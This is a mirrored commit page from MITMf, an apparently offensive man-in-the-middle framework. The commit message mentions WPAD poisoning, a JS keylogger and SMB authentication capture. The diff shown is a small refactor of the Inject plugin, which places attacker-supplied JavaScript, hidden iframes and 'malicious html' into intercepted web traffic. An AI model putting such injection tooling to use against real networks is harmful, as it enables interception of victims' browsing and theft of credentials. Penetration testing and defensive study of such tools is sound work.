mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-06 13:02:24 -07:00
WPAD Poisoner back online, removed options in config file and rellative code for choosing which DNS server to use. (there really was not point in keeping it)
the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them. Modified and re-added the JS-keylogger and SMBauth plugins
This commit is contained in:
parent
aa4e022ab0
commit
5d07551a50
13 changed files with 312 additions and 165 deletions
|
@ -87,14 +87,13 @@ class Inject(CacheKill, Plugin):
|
|||
self.dtable[ip+hn] = True
|
||||
self.count += 1
|
||||
mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
|
||||
return {'request': request, 'data': data}
|
||||
else:
|
||||
return
|
||||
|
||||
return {'request': request, 'data': data}
|
||||
|
||||
def _get_payload(self):
|
||||
return self._get_js() + self._get_iframe() + self.html_payload
|
||||
|
||||
def add_options(self,options):
|
||||
def add_options(self, options):
|
||||
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
|
||||
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
|
||||
options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
|
||||
|
@ -136,7 +135,6 @@ class Inject(CacheKill, Plugin):
|
|||
if self.per_domain:
|
||||
return not ip+hn in self.dtable
|
||||
|
||||
#print mime
|
||||
return mime.find(self.mime) != -1
|
||||
|
||||
def _get_req_info(self, request):
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue